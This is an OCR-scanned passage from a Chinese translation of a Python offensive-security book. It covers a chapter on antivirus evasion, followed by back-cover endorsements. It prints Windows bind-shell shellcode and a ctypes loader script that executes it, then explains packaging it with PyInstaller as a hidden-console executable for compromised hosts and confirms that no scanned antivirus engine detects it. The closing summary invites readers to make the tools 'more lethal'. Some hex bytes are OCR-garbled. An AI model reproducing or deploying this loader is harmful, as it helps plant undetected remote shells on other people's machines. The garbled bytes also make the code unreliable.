"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" 
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" 
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" 
"\x46\xf£\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56" 
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" 
"\x05\xbb\x47\x13\x72\x6f£\x6a\x00\x53\xff\xd5"; 


接 下 来 ， 我 们 要 写 一 段 用 来 执行 这 段 C 语言 风格 的 shellcode MA. Python 支持 导入 其 他 
语言 的 函数 库 。 我 们 需要 导入 ctypes 库 一 一 这 个 库 使 我 们 能 使 用 C 语言 中 的 数据 类 型 。 在 定 
义 了 一 个 用 来 存放 shellcode 变量 之 后 ， 只 需 把 该 变量 视 为 一 个 C 语言 的 函数 ， 并 执行 它 即 
可 。 为 了 下 文中 引用 方便 ， 我 们 把 这 个 文件 保存 为 “bindshell.py”: 


fromctypes import * 
shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64 
\x8b\x52\x30" | 
"\ x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0£\xb7\x4a\x26\x31\xft" 
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xcl\xcf£\x0d\x01\xc7\xe2" 
"\x£0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" 
"\ xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" 
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xcl\xcf£\x0d". 
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" 
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\xlc\x01\xd3\x8b" 
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xf£" 
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" 
"\x77\x73\x%32\x5£\x54\x68\x4c\x77\x26\x07\xf£\xd5\xb8\x90\x01" 
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" 
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" 
"\x31\xdb\x53\x68\x02\x00\x05\x39\x89\xe6\x6a\x10\x56\x57\x68" 
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" 
"\x53\x53\x57\x68\x74\xec\x3b\xel\xff\xd5\x57\x89\xc7\x68\x75" 
"\x6e\x4d\x61\xff£\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" 
"\x31\x£6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" 
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x%46\x56\x4e" 
"\x56\x56\x53\x56\x68\x79\xcc\x3£\x86\xff£\xd5\x89\xe0\x4e\x56" 
"\x46\xf£\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56" 
"\x68\xa6\x95\xbd\x9d\xff£\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" 
"\x05\xbb\x47\x13\x72\x6f£\x6a\x00\x53\xff\xd5") ; 
memorywithshell = create string _buffer(shellcode, len(shellcode) ) 
shell = cast (memorywithshell, CFUNCTYPE(c void p)) 
shell () 
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虽然 现在 这 个 脚本 已 经 可 以 在 一 台 安 装 了 Python 解释 器 的 Windows 计算 机 上 执行 了 ， 但 
我 们 还 是 应 该 对 它 进行 一 些 改进 一 一 用 PYinstaller( 能 从 http://www.pyinstaller.org 处 下 载 到 ) 
编译 它 。Pyinstaller 会 把 Python 脚本 转换 成 一 个 独立 的 可 执行 文件 ， 这 样 它 在 没有 安装 
Python 解释 器 的 系统 中 也 一 样 可 以 运行 。 在 编译 我 们 的 脚本 之 前 ， 必 须 先 运行 Pyinstaller 中 
自 带 的 Configure.py 脚本 : 











在 下 一 步 中 ， 为 了 生成 Windows PE (portable executable) 格式 的 可 执行 文件 ， 我 们 要 先 
命令 Pyinstaller 生成 一 个 .spec 文件 。 要 让 Pyinstaller 生成 的 程序 执行 时 不 显示 命令 行 界面 一 一 
使 用 参数 noconsole, 并 把 最 终 的 可 执行 文件 放 入 单个 平坦 (flat〉 的 文件 中 一 一 使 用 参数 
onefile: 





有 了 这 个 .spec 文件 后 ， 我 们 可 以 命令 Pyinstaller 生成 一 个 可 执行 文件 ， 以 便 能 分 发 到 各 
台 “ 肉 机 ”!' 上 。Pyinstaller 将 会 在 “bindshell\dist\” 目 录 中 生成 一 个 名 为 “bindshell.exe” 的 
可 执行 文件 。 现 在 我 们 就 可 以 把 这 个 可 执行 文件 分 发 到 任意 一 台 Windows 32 位 的 “ 肉 机 ” 
$e 





1 黑客 术语 ， 被 侵入 且 被 黑客 控制 的 计算 机 被 称 为 “ 肉 机 ”。 一 一 译 者 注 
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= 


在 一 台 “ 肉 机 ”上 运行 这 个 可 执行 文件 之 后 ， 我 们 看 到 TCP 端口 1337 已 经 被 监听 了 : 


1 = ~ pmi 
= ~ 


连接 上 “ 肉 机 ”IP 地 址 的 TCP 端口 1337 之 后 ， 我 们 发 现 我 们 的 恶意 软件 已 经 像 预期 的 
那样 成 功 运行 了 。 但 它 能 够 成 功 避 开 杀 毒 软件 的 追 杀 吗 ? 我 们 将 在 下 一 节 中 编写 一 个 Python 
脚本 进行 验证 。 





免 杀 验证 


我 们 将 使 用 vscan.novirusthanks.org 的 服务 来 扫描 可 执行 文件 。NoVirusThanks 提供 了 一 
个 Web 网 页 界面 ， 可 以 上 传 可 疑 文件 ， 然 后 用 14 种 不 同 的 杀毒 引擎 扫描 它 。 上 传 恶意 文件 
之 后 ，Web 网 页 界面 将 会 告诉 我 们 想 要 知道 的 信息 。 我 们 利用 这 一 点 可 以 编写 出 一 个 小 巧 的 
Python 脚本 自动 完成 这 一 步 又。 在 通过 Web 网 页 界面 交互 时 ， 抓 取 一 个 tcpdump MAE, 


2 当 本 章 被 翻译 时 ，vscan.novirusthanks.org 已 经 被 关闭 。 但 你 可 以 改造 这 个 脚本 ， 使 之 能 操作 其 他 在 线 
恶意 软件 测试 网 站 。 一 一 译 者 注 
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这 给 我 们 编写 Python 脚本 开 了 一 个 好 头 。 在 抓 包 文件 中 可 以 看 到 HTTP 头 部 中 设置 了 
boundary 字段 ， 它 是 用 来 分 隔 文件 内 容 和 数据 包 中 其 他 内 容 的 。 我 们 的 脚本 需要 使 用 这 个 头 
部 及 其 中 的 各 个 参数 来 提交 文件 : 


现在 利用 httplib 库 写 一 个 小 巧 的 Python 函数 ， 该 函数 接受 一 个 参数 ， 也 就 是 文件 名 。 在 


打开 文件 并 读 取 其 中 的 内 容 之 后 ， 它 会 创建 一 个 与 vscan.novirusthanks.org 的 连接 ， 并 提交 头 
部 和 数据 参数 。 该 页 面 会 返回 一 个 响应 ， 其 中 的 location 字段 中 记录 了 上 传 文件 分 析 结 果 页 面 
的 存放 位 置 : 


Pace tee 
SUR Pe: at 


he te 
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检 Æ 从 vscan.novirusthanks.org 返回 的 location 字段 ， 我 们 看 到 服务 器 在 
“http://vscan.novirusthanks.org + /file/ + md5sum( 文 件 内 容 ) + / + base64( 文 件 名 )/” 这 个 位 置 上 
生成 了 一 个 返回 页 面 。 该 页 面 中 含有 一 些 JavaScript 代码 ， 它 显示 一 条 “正在 扫描 文件 ”的 消 
息 ， 直 到 一 个 完整 的 分 析 结 果 页 面 就 绪 之 后 再 刷新 页 面 。 这 时 ， 页 面 会 返回 一 个 HTTP 状态 
码 302， 它 将 重 定向 至 http://vscan.novirusthanks.org + /analysis/ + md5sum( 文 件 内 容 ) + / + 
base64( 文 件 名 )。 我 们 的 新 页 面 只 是 把 URL 中 的 “file” 换 成 了 “analysis”: 







查看 分 析 结 果 页 面 的 源码 ， 我 们 看 到 其 中 包含 一 个 发 现 率 (detection rate) 的 字符 串 ， 在 这 个 
字符 串 中 含有 一 些 CSS 代码 ， 当 我 们 把 它 打印 到 命令 行 窗口 中 时 ， 需 要 把 这 些 代码 去 掉 : 






在 弄 清楚 如 何 连 上 分 析 结 果 页 面 以 及 需要 去 掉 CSS 代码 之 后 ， 我 们 就 可 以 写 出 一 个 把 我 
们 上 传 的 可 疑 文件 的 扫描 结果 打印 出 来 的 Python WA. BA, 我 们 的 脚本 要 连 到 “file” 页 
面 ， 它 会 返回 一 个 “正在 进行 扫描 ”的 消息 。 一 旦 这 个 页 面 返回 一 个 HTTP 302， 就 重 定向 到 
分 析 结 果 页 面 ， 我 们 可 以 使 用 一 个 正则 表达 式 读 取 发 现 率 ， 并 把 CSS 代码 用 空白 字符 串 蔡 换 
掉 。 接 着 就 可 以 把 发 现 率 字符 串 打 印 到 屏幕 上 : 
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添加 一 些 参数 解析 代码 之 后 ， 我 们 现在 有 了 一 个 能 上 传 文件 ， 并 使 用 vscan.novirusthanks.org 


的 服务 扫描 它 ， 然 后 打印 发 现 率 的 脚本 : 





第 7 章 用 Python 实现 免 杀 





Python 444%: 运用 Python 成 为 顶级 黑客 


我 们 先 用 一 个 已 知 的 恶意 可 执行 文件 来 测试 一 下 杀毒 程序 是 否 真能 把 它 检测 出 来 。 生 成 
一 个 绑 定 TCP 端口 1337 的 Windows TCP bindshell。 使 用 默认 的 Metasploit 编码 器 把 它 编码 到 
一 个 标准 的 Windows 可 执行 文件 中 。 请 注意 结果 : 我 们 可 以 看 到 14 个 杀毒 引擎 中 有 10 个 把 
它 检测 为 恶意 软件 。 这 个 文件 显然 无 法 逃 过 正常 的 杀毒 软件 的 查 杀 。 


但 是 用 我 们 的 virusCheck.py 脚本 提交 Python 脚本 编译 的 可 执行 文件 ， 并 把 它 上 传 给 
NoVirusThanks 后 ， 会 看 到 14 个 杀毒 软件 无 一 能 够 检测 出 它 是 一 个 恶意 软件 。 成 功 ! 我 们 用 
短 短 几 行 Python 代码 就 能 完全 骗 过 杀毒 软件 : 
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[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file... 

[+] Scanning file.. 

[+] Detection rate: 0 on 14 (0%) 


本 草 小 结 


恭喜 ! 你 已 经 看 完了 最 后 一 章 ， 本 书 也 差不多 快 结束 了。 之 前 的 内 容 涵 盖 了 许多 不 同 的 
概念 。 我 们 从 如 何 编 写 辅助 进行 渗透 测试 的 Python 代码 讲 起 ， 一 路 上 编写 代码 的 目的 涉猎 了 
研究 法 证 记录 、 分 析 网 络 流量 、 进 行 无 线 攻 击 和 分 析 Web 页 面 ， 以 及 社交 媒体 等 主题 。 这 最 
后 一 章 中 阐述 了 一 种 编写 能 逃避 杀毒 软件 扫描 的 恶意 软件 的 方法 。 

在 看 完 本 书 之 后 ， 回 顾 之 前 的 章节 。 你 该 怎样 修改 之 前 的 脚本 ， 使 之 能 适应 你 自己 的 特 
殊 需 求 呢 ? 你 要 怎样 才能 令 它 们 更 高 效 或 者 更 致命 呢 ? 细 想 一 下 本 章 中 的 例子 ， 你 能 不 能 用 
一 个 加 密 心 片 在 执行 前 加 密 shellcode 以 逃避 杀毒 软件 的 特征 码 匹 配 ? 今天 你 又 该 在 Python Fa 
辑 器 中 写 下 些 什么 呢 ? 有 了 这 些 想法 后 ， 我 们 再 给 你 留 一 句 亚 里 士 多 德 的 甬 言 : 

“We make war that we may live in peace.”( 战 争 是 为 了 和 平 。) 
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Python 在 黑客 领域 拥有 霸主 地 位 。 在 XCon 召 开 的 这 15 年 作为 系统 管理 出 身 的 一 名 安全 人 员 ， 对 脚本 类 语言 具有 
中 ，Python 已 经 发 展 成 为 与 C/C++ 一 样 是 黑客 必 备 的 技 天然 的 好 感 ， 之 前 写 过 VBScript 、， Perl、Shell， 转 行 做 
能 之 二 也 安全 以 后 接触 到 Python， it nla ie sera oi 

的 利器 ， 非 常 适合 解决 网 络 安全 攻防 中 面临 的 各 种 复杂 


Wl r. P 7 
本 书包 含 渗 透 测 试 、Web 分 析 、 网 络 分 析 、 取 证 分 析 ， 从 基本 的 端口 扫描 至 era BP, 从 Web 


< Fl Sy 7S 1 
BAR EIR HATE Phon SC 利用 方法 。 不 管 ee 2 扩展 工具 ， 有 从 验证 码 识别 到 权限 所 和 
an n H HBX I urp R » AA pas Eb BREET 
尔 是 刚 开 始 学 习 Python 程 序 的 “小 白 ”， 还 是 一 个 具有 sagt ie | el Serre 
We = Aia 法 C {E AG TE H 中 月 ] L 才 se 浅 7 入 R 的 j 讲 解 ` A Ik 省 TE PN 


丰富 经 验 的 渗透 攻击 高 手 ， 这 本 书 都 会 给 你 非常 大 的 帮 ate | PSA 
ia WEES gh en er Python 的 神奇 世界 ， 通 过 对 攻击 案例 的 解析 ， 理 论 结合 
助 ， 引 领 你 成 为 顶级 的 黑客 高 手 。 在 我 创办 的 “神话 =- 和信 mm 


息 安全 人 才 其 覆 行 动 ”中 ，Python 是 我 们 的 必修 课 之 i ty oe oe as ee en 

”此 韦 将 会 是 = 我 们 ` Et: 话 行 动 ” A FA Ky 学 习 的 专 业 书 籍 而 能 快速 上 手 编 与 代码 。 通过 对 这 ix = Fe It ne =}, re 

sha 不 仅 能 掌握 Python 的 各 种 应 用 ， 还 能 拓宽 视野 ， 培 养 和 

Ea = dr 本 书 适合 有 一 定编 程 基 础 的 安全 

一 一 王 英 健 ( Rt) XCon 创 始 人 、 神 话 行 动 创始 人 ， 爱好 者 、 计 算 机 从 业 人 员 阅 读 ， 特 别 是 对 正在 学 习 计 算 
XFocus 创 始 人 之 一 er et BAA BEJ. 


Python 是 一 门 非常 容易 上 手 的 脚本 语言 ， 但 要 迅速 掌握 
其 丰富 的 安全 工具 库 并 熟练 运用 绝 非 易 事 。 市 面 上 的 
Python 入 门 书籍 虽然 非 芝 多 ， 但 真正 从 安全 从 业者 角度 
深入 浅 出 地 介绍 的 书籍 几乎 没有 。 本 书 的 出 现 无 疑 给 安 
全 从 业者 带 来 了 福音 ， 对 Python 初学 者 来 说 ， 第 1 章 的 内 Python 因 其 特性 而 成 为 黑客 们 青睐 的 语言 。 本 书 对 
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容 可 以 使 其 迅速 掌握 Python 语 言 ， 而 之 后 的 几 章 几乎 涵 Python 在 安全 领域 的 应 用 做 了 实战 的 引导 ， ABS fH 
盖 了 安全 研究 的 每 个 方面 ， 并 且 配 以 近 几 年 比较 热门 的 ( 当然 ， 如 果 想 成 为 顶级 显 客 ， 仅 擎 握 Python 还 远 远 
案例 ( 例如 ，LOIC、Conficker 等 ) ， 无 论 你 是 进行 漏洞 不 够 ) 。 感 谢 这 本 书 对 Python 做 了 很 好 的 梳理 。 

研究 、 取证 分 析 、 渗透 测试 、 DDoS 对 抗 还 ERAS, 都 Away Int A Set RB MSH Aline eK 
可 以 从 本 书 中 学 到 有 用 的 知识 和 技能 ， 使 自 已 在 学 习 过 一 一 余弦 知道 创 宇 技术 副 总 裁 ， Web 8 unmet 7S 


z 路 = 揭秘 》 作 者 
程 中 少 走 弯 路 ， 在 工作 中 事半功倍 。 #1 
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KeenTeam 高 级 研究 员 





本 书 就 像 一 本 武林 秘籍 ， 专 注 于 教会 你 使 用 一 种 武器 一 一 
Python， 只 要 掌握 了 这 把 利器 ， 你 就 能 够 完成 渗透 测试 中 
可 能 涉及 的 方方面面 。 译 者 是 资深 的 安全 专家 ， 他 将 书 中 
所 有 的 技术 细节 精准 和 优雅 地 传达 大 给 了 读者 。 


一 一 杨 坤 蓝 莲花 战队 队长 ， 长 亭 科技 首席 安全 研究 员 
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